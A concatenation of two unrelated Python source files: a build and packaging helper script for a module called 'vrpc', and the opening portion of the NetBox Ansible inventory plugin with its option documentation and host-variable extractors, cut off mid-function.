base_dir: str = ""
session_dir: str = ""
persistent_dir: str = ""
quiet: bool = True
verbose: bool = True
target_platform: str = None
def get_cwd() -> str:
cwd = os.path.dirname(os.path.realpath(__file__))
if not cwd:
cwd = os.getcwd()
return cwd
FLAGS = Flags(module_name="vrpc")
def log(msg, force=False):
if force or not FLAGS.quiet:
try:
print(msg, file=sys.stderr)
except Exception:
print("<failed to log>", file=sys.stderr)
def log_verbose(msg):
if FLAGS.verbose:
log(msg, force=True)
def fail(msg):
fail_if(True, msg)
def target_platform():
if FLAGS.target_platform is None:
FLAGS.target_platform = platform.system().lower()
return FLAGS.target_platform
def fail_if(p, msg):
if p:
print("error: {}".format(msg), file=sys.stderr)
sys.exit(1)
def mkdir(path):
log_verbose("mkdir: {}".format(path))
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
def rmdir(path):
log_verbose("rmdir: {}".format(path))
shutil.rmtree(path, ignore_errors=True)
def cpdir(src, dest):
log_verbose("cpdir: {} -> {}".format(src, dest))
copy_tree(src, dest, preserve_symlinks=1)
def get_version():
with open(os.path.join(FLAGS.base_dir, "VERSION"), "r") as vfile:
FLAGS.version = vfile.readline().strip()
log("version: {}".format(FLAGS.version))
def reset_version():
# Determine the versions from VERSION file.
reset_version = "0.0.0"
filename = os.path.join(FLAGS.base_dir, "VERSION")
with open(filename, "w") as vfile:
vfile.writelines(f"{reset_version}")
lines = []
filename = os.path.join(FLAGS.cwd, ".bumpversion.cfg")
with open(filename, "r") as vfile:
lines = vfile.readlines()
for i, line in enumerate(lines):
if line.startswith("current_version = "):
lines[i] = f"current_version = {reset_version}\n"
with open(filename, "w") as vfile:
vfile.writelines(lines)
get_version()
log("version: {}".format(FLAGS.version))
def bump_to_version(minor: bool = False, major: bool = False, reset: bool = False):
runarguments = ["bump2version", "--allow-dirty"]
if reset:
reset_version()
runarguments += ["patch"]
elif major:
runarguments += ["major"]
elif minor:
runarguments += ["minor"]
else:
runarguments += ["patch"]
# runarguments = ['which', 'bump2version']
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "bump_to_version failed")
get_version()
except Exception as e:
logging.error(e)
logging.error(traceback.format_exc())
fail("bump_to_version failed")
def remove_file_or_dir(inp_path, recursive=False):
"""param <path> could either be relative or absolute."""
path = str(pathlib.Path(inp_path).absolute())
if os.path.isfile(path) or os.path.islink(path):
os.remove(path) # remove the file
elif os.path.isdir(path):
shutil.rmtree(path) # remove dir and all contains
else:
glob_list = glob.glob(path, recursive=recursive)
if len(glob_list) > 0:
for name in glob_list:
log_verbose(name)
if os.path.isfile(name) or os.path.islink(name):
os.remove(name) # remove the file
elif os.path.isdir(name):
shutil.rmtree(name) # remove dir and all contains
def remove_cythonize():
remove_file_or_dir(FLAGS.dist_dir)
def remove_session_dir():
remove_file_or_dir(FLAGS.session_dir)
def remove_persistent_dir():
remove_file_or_dir(FLAGS.persistent_dir)
def clean_cythonize():
remove_file_or_dir("build")
remove_file_or_dir(f"{FLAGS.base_dir}.egg-info")
remove_file_or_dir(f"{FLAGS.base_dir}/**/*.c", recursive=True)
remove_file_or_dir(f"{FLAGS.base_dir}/**/*.o", recursive=True)
if target_platform() == "windows":
remove_file_or_dir(f"{FLAGS.base_dir}/**/*.pyd", recursive=True)
# remove_file_or_dir(f'{FLAGS.base_dir}/**/*.so', recursive=True)
# rm -rf *.egg-info
# find . -name "*.c" -type f -delete
# find . -name "*.o" -type f -delete
# find . -name "*.so" -type f -delete
def zip_dir(dir_name, filename):
"""zipper"""
with zipfile.ZipFile(filename, "w", compression=zipfile.ZIP_DEFLATED, allowZip64=True) as zip:
for root, _, files in os.walk(dir_name):
for f in files:
rel_path = os.path.join(os.path.relpath(root, dir_name), f)
abs_path = os.path.join(root, f)
zip.write(abs_path, rel_path)
def wheel_remove_source_files():
for filename in glob.glob(os.path.join(FLAGS.dist_dir, "*.whl")):
name = os.path.splitext(os.path.basename(filename))[0]
try:
dir_name = os.path.join(FLAGS.dist_dir, name)
os.mkdir(dir_name)
log_verbose(f"Extracting files in {dir_name}")
with zipfile.ZipFile(filename) as zip:
zip.extractall(path=dir_name)
file_list = glob.glob(os.path.join(dir_name, "**/*.py"), recursive=True)
file_list.extend(glob.glob(os.path.join(dir_name, "**/*.c"), recursive=True))
for filename1 in file_list:
if not filename1.endswith("__init__.py"):
if os.path.isfile(filename1) or os.path.islink(filename1):
os.remove(filename1) # remove the file
zip_dir(dir_name, filename)
shutil.rmtree(dir_name)
except zipfile.BadZipfile:
print("BAD ZIP: " + filename)
log(filename)
def do_cythonize():
clean_cythonize()
remove_cythonize()
# runarguments = [sys.executable, 'setup.py', 'bdist_wheel', '--exclude_source_files']
runarguments = [sys.executable, "setup.py", "bdist_wheel", "-d", FLAGS.dist_dir]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
wheel_remove_source_files()
clean_cythonize()
fail_if(p.returncode != 0, "do_cythonize failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_cythonize failed")
def do_mypy_test():
runarguments = [sys.executable, "-m", "mypy", FLAGS.base_dir]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "do_mypy_test failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_mypy_test failed")
def do_sort_import():
runarguments = [sys.executable, "-m", "isort", FLAGS.base_dir]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "do_sort_import failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_sort_import failed")
def do_format_black():
runarguments = [sys.executable, "-m", "black", FLAGS.base_dir]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "do_format_black failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_format_black failed")
def do_format_yapf():
runarguments = [
sys.executable,
"-m",
"yapf",
"--in-place",
"--recursive",
FLAGS.base_dir,
]
log("Yapf formatting started")
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "do_format_yapf failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_format_yapf failed")
log("Yapf formatting completed")
def generate_proto_code():
proto_interface_dir = f"{FLAGS.module_name}/data_models/interfaces"
out_folder = f"{FLAGS.module_name}/data_models"
proto_it = pathlib.Path().glob(proto_interface_dir + "/**/*")
protos = [str(proto) for proto in proto_it if proto.is_file()]
protoc_exe = "protoc"
if target_platform() == "windows":
protoc_exe = "protoc/bin/protoc.exe"
l = [protoc_exe] + protos + ["--python_betterproto_out", out_folder, "--proto_path", proto_interface_dir]
str1 = ' '.join(l)
log(f"Executing command: {str1}")
subprocess.check_call(l)
def generate_proto_cpp_code():
proto_interface_dir = f"{FLAGS.module_name}/data_models/interfaces"
out_folder = f"{FLAGS.module_name}/data_models_cpp"
proto_it = pathlib.Path().glob(proto_interface_dir + "/**/*")
protos = [str(proto) for proto in proto_it if proto.is_file()]
protoc_exe = "protoc"
if target_platform() == "windows":
protoc_exe = "protoc/bin/protoc.exe"
l = [protoc_exe] + protos + ["--cpp_out", out_folder, "--proto_path", proto_interface_dir]
str1 = ' '.join(l)
log(f"Executing command: {str1}")
subprocess.check_call(l)
class ExtendedEnvBuilder(venv.EnvBuilder):
"""
This builder installs setuptools and pip so that you can pip or
easy_install other packages into the created virtual environment.
:param nodist: If true, setuptools and pip are not installed into the
created virtual environment.
:param nopip: If true, pip is not installed into the created
virtual environment.
:param progress: If setuptools or pip are installed, the progress of the
installation can be monitored by passing a progress
callable. If specified, it is called with two
arguments: a string indicating some progress, and a
context indicating where the string is coming from.
The context argument can have one of three values:
'main', indicating that it is called from virtualize()
itself, and 'stdout' and 'stderr', which are obtained
by reading lines from the output streams of a subprocess
which is used to install the app.
If a callable is not specified, default progress
information is output to sys.stderr.
"""
def __init__(self, *args, **kwargs):
self.nodist = kwargs.pop("nodist", False)
self.nopip = kwargs.pop("nopip", False)
self.progress = kwargs.pop("progress", None)
self.verbose = kwargs.pop("verbose", False)
super().__init__(*args, **kwargs)
def post_setup(self, context):
"""
Set up any packages which need to be pre-installed into the
virtual environment being created.
:param context: The information for the virtual environment
creation request being processed.
"""
os.environ["VIRTUAL_ENV"] = context.env_dir
# if not self.nodist:
# self.install_setuptools(context)
# Can't install pip without setuptools
if not self.nopip and not self.nodist:
self.install_pip(context)
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not self.verbose:
sys.stderr.write(".")
else:
sys.stderr.write(s.decode("utf-8"))
sys.stderr.flush()
stream.close()
def install_script(self, context, name, url):
_, _, path, _, _, _ = urlparse(url)
fn = os.path.split(path)[-1]
binpath = context.bin_path
distpath = os.path.join(binpath, fn)
# Download script into the virtual environment's binaries folder
urlretrieve(url, distpath)
progress = self.progress
if self.verbose:
term = "\n"
else:
term = ""
if progress is not None:
progress("Installing %s ...%s" % (name, term), "main")
else:
sys.stderr.write("Installing %s ...%s" % (name, term))
sys.stderr.flush()
# Install in the virtual environment
args = [context.env_exe, fn]
p = Popen(args, stdout=PIPE, stderr=PIPE, cwd=binpath)
t1 = Thread(target=self.reader, args=(p.stdout, "stdout"))
t1.start()
t2 = Thread(target=self.reader, args=(p.stderr, "stderr"))
t2.start()
p.wait()
t1.join()
t2.join()
if progress is not None:
progress("done.", "main")
else:
sys.stderr.write("done.\n")
# Clean up - no longer needed
os.unlink(distpath)
def install_setuptools(self, context):
"""
Install setuptools in the virtual environment.
:param context: The information for the virtual environment
creation request being processed.
"""
url = "https://bitbucket.org/pypa/setuptools/downloads/ez_setup.py"
self.install_script(context, "setuptools", url)
# clear up the setuptools archive which gets downloaded
pred = lambda o: o.startswith("setuptools-") and o.endswith(".tar.gz")
files = filter(pred, os.listdir(context.bin_path))
for f in files:
f = os.path.join(context.bin_path, f)
os.unlink(f)
def install_pip(self, context):
"""
Install pip in the virtual environment.
:param context: The information for the virtual environment
creation request being processed.
"""
url = "https://bootstrap.pypa.io/get-pip.py"
self.install_script(context, "pip", url)
def remove_virtual_env():
remove_file_or_dir(FLAGS.virtual_env_path, True)
def create_virtual_env():
builder = ExtendedEnvBuilder()
builder.create(FLAGS.virtual_env_path)
with open(os.path.join(FLAGS.virtual_env_path, ".gitignore"), "w") as f:
f.writelines(["*"])
log(f"Create virtual environment {FLAGS.virtual_env_path}")
def get_module_name() -> str:
glob_list = glob.glob(os.path.join(FLAGS.dist_dir, f"{FLAGS.module_name}*.whl"))
for name in glob_list:
log_verbose(name)
return name
return f"{FLAGS.module_name}.whl"
def install_requirements_in_virtual_env():
if target_platform() == "windows":
pip_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "Scripts", "python.exe")
else:
pip_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "bin", "python")
runarguments = [pip_in_virtual_env, "-m", "pip", "install", "-r", os.path.join(FLAGS.cwd, "requirements.txt")]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
logging.info("Running pip")
p.wait()
fail_if(p.returncode != 0, f"pip failed {p.returncode}")
except Exception:
logging.error(traceback.format_exc())
fail("pip failed")
def install_module_in_virtual_env():
if target_platform() == "windows":
pip_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "Scripts", "python.exe")
else:
pip_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "bin", "python")
runarguments = [pip_in_virtual_env, "-m", "pip", "install", "--upgrade", "--no-deps", "--force-reinstall", get_module_name()]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
logging.info("Running pip")
p.wait()
fail_if(p.returncode != 0, f"pip failed {p.returncode}")
except Exception:
logging.error(traceback.format_exc())
fail("pip failed")
def run_module_in_virtual_env():
if target_platform() == "windows":
module_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "Scripts", f"{FLAGS.module_name}.exe")
else:
module_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "bin", f"{FLAGS.module_name}")
runarguments = [module_in_virtual_env]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
logging.info("Running module")
time.sleep(10)
logging.info("Sending stop signal")
p.send_signal(signal.SIGTERM)
p.wait()
fail_if(p.returncode != 0, f"run_module failed {p.returncode}")
except Exception:
logging.error(traceback.format_exc())
fail("run_module failed")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
group_qv = parser.add_mutually_exclusive_group()
group_qv.add_argument(
"-q",
"--quiet",
action="store_true",
required=False,
help="Disable console output.",
)
group_qv.add_argument(
"-v",
"--verbose",
action="store_true",
required=False,
help="Enable verbose output.",
)
parser.add_argument("--enable-logging", action="store_true", required=False, help="Enable logging.")
parser.add_argument(
"--enable-stats",
action="store_true",
required=False,
help="Enable statistics collection.",
)
F = parser.parse_args()
if F.quiet is not None:
if F.quiet == False:
FLAGS.quiet = False
if F.verbose is not None:
if F.verbose == True:
FLAGS.verbose = True
# FLAGS = parser.parse_args()
# FLAGS.module_name = "vrpc"
FLAGS.cwd = get_cwd()
FLAGS.virtual_env_path = os.path.join(FLAGS.cwd, "xx")
FLAGS.dist_dir = os.path.join(get_cwd(), "dist")
FLAGS.base_dir = os.path.join(get_cwd(), FLAGS.module_name)
FLAGS.session_dir = os.path.join(get_cwd(), "session")
FLAGS.persistent_dir = os.path.join(get_cwd(), "persistent")
print(sys.executable)
# Determine the versions from VERSION file.
# get_version()
# # reset_version()
# bump_to_version()
# remove_session_dir()
# remove_persistent_dir()
generate_proto_code()
# generate_proto_cpp_code()
# do_sort_import()
# do_format_black()
# do_format_yapf()
# do_mypy_test()
# do_cythonize()
# remove_virtual_env()
# create_virtual_env()
# install_requirements_in_virtual_env()
# install_module_in_virtual_env()
# run_module_in_virtual_env()
|
nb_inventory.py
|
# Copyright (c) 2018 Remy Leone
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
name: nb_inventory
plugin_type: inventory
author:
- Remy Leone (@sieben)
- Anthony Ruhier (@Anthony25)
- Nikhil Singh Baliyan (@nikkytub)
- Sander Steffann (@steffann)
- Douglas Heriot (@DouglasHeriot)
short_description: NetBox inventory source
description:
- Get inventory hosts from NetBox
extends_documentation_fragment:
- constructed
- inventory_cache
options:
plugin:
description: token that ensures this is a source file for the 'netbox' plugin.
required: True
choices: ['netbox.netbox.nb_inventory']
api_endpoint:
description: Endpoint of the NetBox API
required: True
env:
- name: NETBOX_API
validate_certs:
description:
- Allows connection when SSL certificates are not valid. Set to C(false) when certificates are not trusted.
default: True
type: boolean
cert:
description:
- Certificate path
default: False
key:
description:
- Certificate key path
default: False
ca_path:
description:
- CA path
default: False
follow_redirects:
description:
- Determine how redirects are followed.
- By default, I(follow_redirects) is set to uses urllib2 default behavior.
default: urllib2
choices: ['urllib2', 'all', 'yes', 'safe', 'none']
config_context:
description:
- If True, it adds config_context in host vars.
- Config-context enables the association of arbitrary data to devices and virtual machines grouped by
region, site, role, platform, and/or tenant. Please check official netbox docs for more info.
default: False
type: boolean
flatten_config_context:
description:
- If I(config_context) is enabled, by default it's added as a host var named config_context.
- If flatten_config_context is set to True, the config context variables will be added directly to the host instead.
default: False
type: boolean
version_added: "0.2.1"
flatten_local_context_data:
description:
- If I(local_context_data) is enabled, by default it's added as a host var named local_context_data.
- If flatten_local_context_data is set to True, the config context variables will be added directly to the host instead.
default: False
type: boolean
version_added: "0.3.0"
flatten_custom_fields:
description:
- By default, host custom fields are added as a dictionary host var named custom_fields.
- If flatten_custom_fields is set to True, the fields will be added directly to the host instead.
default: False
type: boolean
version_added: "0.2.1"
token:
required: False
description:
- NetBox API token to be able to read against NetBox.
- This may not be required depending on the NetBox setup.
env:
# in order of precedence
- name: NETBOX_TOKEN
- name: NETBOX_API_KEY
plurals:
description:
- If True, all host vars are contained inside single-element arrays for legacy compatibility with old versions of this plugin.
- Group names will be plural (ie. "sites_mysite" instead of "site_mysite")
- The choices of I(group_by) will be changed by this option.
default: True
type: boolean
version_added: "0.2.1"
interfaces:
description:
- If True, it adds the device or virtual machine interface information in host vars.
default: False
type: boolean
version_added: "0.1.7"
site_data:
description:
- If True, sites' full data structures returned from Netbox API are included in host vars.
default: False
type: boolean
version_added: "3.5.0"
prefixes:
description:
- If True, it adds the device or virtual machine prefixes to hostvars nested under "site".
- Must match selection for "site_data", as this changes the structure of "site" in hostvars
default: False
type: boolean
version_added: "3.5.0"
services:
description:
- If True, it adds the device or virtual machine services information in host vars.
default: True
type: boolean
version_added: "0.2.0"
fetch_all:
description:
- By default, fetching interfaces and services will get all of the contents of NetBox regardless of query_filters applied to devices and VMs.
- When set to False, separate requests will be made fetching interfaces, services, and IP addresses for each device_id and virtual_machine_id.
- If you are using the various query_filters options to reduce the number of devices, you may find querying NetBox faster with fetch_all set to False.
- For efficiency, when False, these requests will be batched, for example /api/dcim/interfaces?limit=0&device_id=1&device_id=2&device_id=3
- These GET request URIs can become quite large for a large number of devices. If you run into HTTP 414 errors, you can adjust the max_uri_length option to suit your web server.
default: True
type: boolean
version_added: "0.2.1"
group_by:
description:
- Keys used to create groups. The I(plurals) and I(racks) options control which of these are valid.
- I(rack_group) is supported on NetBox versions 2.10 or lower only
- I(location) is supported on NetBox versions 2.11 or higher only
type: list
choices:
- sites
- site
- location
- tenants
- tenant
- racks
- rack
- rack_group
- rack_role
- tags
- tag
- device_roles
- role
- device_types
- device_type
- manufacturers
- manufacturer
- platforms
- platform
- region
- site_group
- cluster
- cluster_type
- cluster_group
- is_virtual
- services
- status
default: []
group_names_raw:
description: Will not add the group_by choice name to the group names
default: False
type: boolean
version_added: "0.2.0"
query_filters:
description: List of parameters passed to the query string for both devices and VMs (Multiple values may be separated by commas)
type: list
default: []
device_query_filters:
description: List of parameters passed to the query string for devices (Multiple values may be separated by commas)
type: list
default: []
vm_query_filters:
description: List of parameters passed to the query string for VMs (Multiple values may be separated by commas)
type: list
default: []
timeout:
description: Timeout for NetBox requests in seconds
type: int
default: 60
max_uri_length:
description:
- When fetch_all is False, GET requests to NetBox may become quite long and return a HTTP 414 (URI Too Long).
- You can adjust this option to be smaller to avoid 414 errors, or larger for a reduced number of requests.
type: int
default: 4000
version_added: "0.2.1"
virtual_chassis_name:
description:
- When a device is part of a virtual chassis, use the virtual chassis name as the Ansible inventory hostname.
- The host var values will be from the virtual chassis master.
type: boolean
default: False
dns_name:
description:
- Force IP Addresses to be fetched so that the dns_name for the primary_ip of each device or VM is set as a host_var.
- Setting interfaces will also fetch IP addresses and the dns_name host_var will be set.
type: boolean
default: False
ansible_host_dns_name:
description:
- If True, sets DNS Name (fetched from primary_ip) to be used in ansible_host variable, instead of IP Address.
type: boolean
default: False
compose:
description: List of custom ansible host vars to create from the device object fetched from NetBox
default: {}
type: dict
racks:
description:
- If False, skip querying the racks for information, which can be slow with great amounts of racks.
- The choices of I(group_by) will be changed by this option.
type: boolean
default: True
version_added: "3.6.0"
"""
EXAMPLES = """
# netbox_inventory.yml file in YAML format
# Example command line: ansible-inventory -v --list -i netbox_inventory.yml
plugin: netbox.netbox.nb_inventory
api_endpoint: http://localhost:8000
validate_certs: True
config_context: False
group_by:
- device_roles
query_filters:
- role: network-edge-router
device_query_filters:
- has_primary_ip: 'true'
# has_primary_ip is a useful way to filter out patch panels and other passive devices
# Query filters are passed directly as an argument to the fetching queries.
# You can repeat tags in the query string.
query_filters:
- role: server
- tag: web
- tag: production
# See the NetBox documentation at https://netbox.readthedocs.io/en/stable/rest-api/overview/
# the query_filters work as a logical **OR**
#
# Prefix any custom fields with cf_ and pass the field value with the regular NetBox query string
query_filters:
- cf_foo: bar
# NetBox inventory plugin also supports Constructable semantics
# You can fill your hosts vars using the compose option:
plugin: netbox.netbox.nb_inventory
compose:
foo: last_updated
bar: display_name
nested_variable: rack.display_name
# You can use keyed_groups to group on properties of devices or VMs.
# NOTE: It's only possible to key off direct items on the device/VM objects.
plugin: netbox.netbox.nb_inventory
keyed_groups:
- prefix: status
key: status.value
# For use in Ansible Tower (AWX), please see this blog from RedHat: https://www.ansible.com/blog/using-an-inventory-plugin-from-a-collection-in-ansible-tower
# The credential for NetBox will need to expose NETBOX_API and NETBOX_TOKEN as environment variables.
# Example Ansible Tower credential Input Configuration:
fields:
- id: NETBOX_API
type: string
label: NetBox Host URL
- id: NETBOX_TOKEN
type: string
label: NetBox API Token
secret: true
required:
- NETBOX_API
- NETBOX_TOKEN
# Example Ansible Tower credential Injector Configuration:
env:
NETBOX_API: '{{ NETBOX_API }}'
NETBOX_TOKEN: '{{ NETBOX_TOKEN }}'
"""
import json
import uuid
import math
import os
from copy import deepcopy
from functools import partial
from sys import version as python_version
from threading import Thread
from typing import Iterable
from itertools import chain
from collections import defaultdict
from ipaddress import ip_interface
from packaging import specifiers, version
from ansible.constants import DEFAULT_LOCAL_TMP
from ansible.plugins.inventory import BaseInventoryPlugin, Constructable, Cacheable
from ansible.module_utils.ansible_release import __version__ as ansible_version
from ansible.errors import AnsibleError
from ansible.module_utils._text import to_text, to_native
from ansible.module_utils.urls import open_url
from ansible.module_utils.six.moves.urllib import error as urllib_error
from ansible.module_utils.six.moves.urllib.parse import urlencode
class InventoryModule(BaseInventoryPlugin, Constructable, Cacheable):
NAME = "netbox.netbox.nb_inventory"
def _fetch_information(self, url):
results = None
cache_key = self.get_cache_key(url)
# get the user's cache option to see if we should save the cache if it is changing
user_cache_setting = self.get_option("cache")
# read if the user has caching enabled and the cache isn't being refreshed
attempt_to_read_cache = user_cache_setting and self.use_cache
# attempt to read the cache if inventory isn't being refreshed and the user has caching enabled
if attempt_to_read_cache:
try:
results = self._cache[cache_key]
need_to_fetch = False
except KeyError:
# occurs if the cache_key is not in the cache or if the cache_key expired
# we need to fetch the URL now
need_to_fetch = True
else:
# not reading from cache so do fetch
need_to_fetch = True
if need_to_fetch:
self.display.v("Fetching: " + url)
try:
response = open_url(
url,
headers=self.headers,
timeout=self.timeout,
validate_certs=self.validate_certs,
follow_redirects=self.follow_redirects,
client_cert=self.cert,
client_key=self.key,
ca_path=self.ca_path,
)
except urllib_error.HTTPError as e:
"""This will return the response body when we encounter an error.
This is to help determine what might be the issue when encountering an error.
Please check issue #294 for more info.
"""
# Prevent inventory from failing completely if the token does not have the proper permissions for specific URLs
if e.code == 403:
self.display.display(
"Permission denied: {0}. This may impair functionality of the inventory plugin.".format(
url
),
color="red",
)
# Need to return mock response data that is empty to prevent any failures downstream
return {"results": [], "next": None}
raise AnsibleError(to_native(e.fp.read()))
try:
raw_data = to_text(response.read(), errors="surrogate_or_strict")
except UnicodeError:
raise AnsibleError(
"Incorrect encoding of fetched payload from NetBox API."
)
try:
results = json.loads(raw_data)
except ValueError:
raise AnsibleError("Incorrect JSON payload: %s" % raw_data)
# put result in cache if enabled
if user_cache_setting:
self._cache[cache_key] = results
return results
def get_resource_list(self, api_url):
"""Retrieves resource list from netbox API.
Returns:
A list of all resource from netbox API.
"""
if not api_url:
raise AnsibleError("Please check API URL in script configuration file.")
resources = []
# Handle pagination
while api_url:
api_output = self._fetch_information(api_url)
resources.extend(api_output["results"])
api_url = api_output["next"]
return resources
def get_resource_list_chunked(self, api_url, query_key, query_values):
# Make an API call for multiple specific IDs, like /api/ipam/ip-addresses?limit=0&device_id=1&device_id=2&device_id=3
# Drastically cuts down HTTP requests comnpared to 1 request per host, in the case where we don't want to fetch_all
# Make sure query_values is subscriptable
if not isinstance(query_values, list):
query_values = list(query_values)
def query_string(value, separator="&"):
return separator + query_key + "=" + str(value)
# Calculate how many queries we can do per API call to stay within max_url_length
largest_value = str(max(query_values, default=0)) # values are always id ints
length_per_value = len(query_string(largest_value))
chunk_size = math.floor((self.max_uri_length - len(api_url)) / length_per_value)
# Sanity check, for case where max_uri_length < (api_url + length_per_value)
if chunk_size < 1:
chunk_size = 1
if self.api_version in specifiers.SpecifierSet("~=2.6.0"):
# Issue netbox-community/netbox#3507 was fixed in v2.7.5
# If using NetBox v2.7.0-v2.7.4 will have to manually set max_uri_length to 0,
# but it's probably faster to keep fetch_all: True
# (You should really just upgrade your NetBox install)
chunk_size = 1
resources = []
for i in range(0, len(query_values), chunk_size):
chunk = query_values[i : i + chunk_size]
# process chunk of size <= chunk_size
url = api_url
for value in chunk:
url += query_string(value, "&" if "?" in url else "?")
resources.extend(self.get_resource_list(url))
return resources
@property
def group_extractors(self):
# List of group_by options and hostvars to extract
# Some keys are different depending on plurals option
extractors = {
"disk": self.extract_disk,
"memory": self.extract_memory,
"vcpus": self.extract_vcpus,
"status": self.extract_status,
"config_context": self.extract_config_context,
"local_context_data": self.extract_local_context_data,
"custom_fields": self.extract_custom_fields,
"region": self.extract_regions,
"cluster": self.extract_cluster,
"cluster_group": self.extract_cluster_group,
"cluster_type": self.extract_cluster_type,
"is_virtual": self.extract_is_virtual,
self._pluralize_group_by("site"): self.extract_site,
self._pluralize_group_by("tenant"): self.extract_tenant,
self._pluralize_group_by("tag"): self.extract_tags,
self._pluralize_group_by("role"): self.extract_device_role,
self._pluralize_group_by("platform"): self.extract_platform,
self._pluralize_group_by("device_type"): self.extract_device_type,
self._pluralize_group_by("manufacturer"): self.extract_manufacturer,
}
if self.api_version >= version.parse("2.11"):
extractors.update(
{
"site_group": self.extract_site_groups,
}
)
if self.racks:
extractors.update(
{
self._pluralize_group_by("rack"): self.extract_rack,
"rack_role": self.extract_rack_role,
}
)
# Locations were added in 2.11 replacing rack-groups.
if self.api_version >= version.parse("2.11"):
extractors.update(
{
"location": self.extract_location,
}
)
else:
extractors.update(
{
"rack_group": self.extract_rack_group,
}
)
if self.services:
extractors.update(
{
"services": self.extract_services,
}
)
if self.interfaces:
extractors.update(
{
"interfaces": self.extract_interfaces,
}
)
if self.interfaces or self.dns_name or self.ansible_host_dns_name:
extractors.update(
{
"dns_name": self.extract_dns_name,
}
)
return extractors
def _pluralize_group_by(self, group_by):
mapping = {
"site": "sites",
"tenant": "tenants",
"rack": "racks",
"tag": "tags",
"role": "device_roles",
"platform": "platforms",
"device_type": "device_types",
"manufacturer": "manufacturers",
}
if self.plurals:
mapped = mapping.get(group_by)
return mapped or group_by
else:
return group_by
def _pluralize(self, extracted_value):
# If plurals is enabled, wrap in a single-element list for backwards compatibility
if self.plurals:
return [extracted_value]
else:
return extracted_value
def _objects_array_following_parents(
self, initial_object_id, object_lookup, object_parent_lookup
):
objects = []
object_id = initial_object_id
# Keep looping until the object has no parent
while object_id is not None:
object_slug = object_lookup[object_id]
if object_slug in objects:
# Won't ever happen - defensively guard against infinite loop
break
objects.append(object_slug)
# Get the parent of this object
object_id = object_parent_lookup[object_id]
return objects
def extract_disk(self, host):
return host.get("disk")
def extract_vcpus(self, host):
return host.get("vcpus")
def extract_status(self, host):
return host["status"]
def extract_memory(self, host):
return host.get("memory")
def extract_platform(self, host):
try:
return self._pluralize(self.platforms_lookup[host["platform"]["id"]])
except Exception:
return
def extract_services(self, host):
try:
services_lookup = (
self.vm_services_lookup
if host["is_virtual"]
else self.device_services_lookup
)
return list(services_lookup[host["id"]].values())
except Exception:
return
def extract_device_type(self, host):
try:
return self._pluralize(self.device_types_lookup[host["device_type"]["id"]])
except Exception:
return
def extract_rack(self, host):
try:
return self._pluralize(self.racks_lookup[host["rack"]["id"]])
except Exception:
return
def extract_rack_group(self, host):
# A host may have a rack. A rack may have a rack_group. A rack_group may have a parent rack_group.
# Produce a list of rack_groups:
# - it will be empty if the device has no rack, or the rack has no rack_group
# - it will have 1 element if the rack's group has no parent
# - it will have multiple elements if the rack's group has a parent group
rack = host.get("rack", None)
if not isinstance(rack, dict):
# Device has no rack
return None
rack_id = rack.get("id", None)
if rack_id is None:
# Device has no rack
return None
return self._objects_array_following_parents(
initial_object_id=self.racks_group_lookup[rack_id],
object_lookup=self.rack_groups_lookup,
object_parent_lookup=self.rack_group_parent_lookup,
)
def extract_rack_role(self, host):
try:
return self.racks_role_lookup[host["rack"]["id"]]
except Exception:
return
def extract_site(self, host):
try:
site = self.sites_lookup[host["site"]["id"]]
if (
self.prefixes
): # If prefixes have been pulled, attach prefix list to its assigned site
prefixes = self.prefixes_sites_lookup[site["id"]]
site["prefixes"] = prefixes
return self._pluralize(site)
except Exception:
return
def extract_tenant(self, host):
try:
return self._pluralize(self.tenants_lookup[host["tenant"]["id"]])
except Exception:
return
def extract_device_role(self, host):
try:
if "device_role" in host:
return self._pluralize(
self.device_roles_lookup[host["device_role"]["id"]]
)
elif "role" in host:
return self._pluralize(self.device_roles_lookup[host["role"]["id"]])
except Exception:
return
def extract_config_context(self, host):
try:
if self.flatten_config_context:
# Don't wrap in an array if we're about to flatten it to separate host vars
return host["config_context"]
else:
return self._pluralize(host["config_context"])
except Exception:
return
def extract_local_context_data(self, host):
try:
if self.flatten_local_context_data:
# Don't wrap in an array if we're about to flatten it to separate host vars
return host["local_context_data"]
else:
return self._pluralize(host["local_context_data"])
except Exception:
return
def extract_manufacturer(self, host):
try:
return self._pluralize(
self.manufacturers_lookup[host["device_type"]["manufacturer"]["id"]]
)
except Exception:
return
def extract_primary_ip(self, host):
try:
address = host["primary_ip"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_primary_ip4(self, host):
try:
address = host["primary_ip4"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_primary_ip6(self, host):
try:
address = host["primary_ip6"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_tags(self, host):
try:
tag_zero = host["tags"][0]
# Check the type of the first element in the "tags" array.
# If a dictionary (NetBox >= 2.9), return an array of tags' slugs.
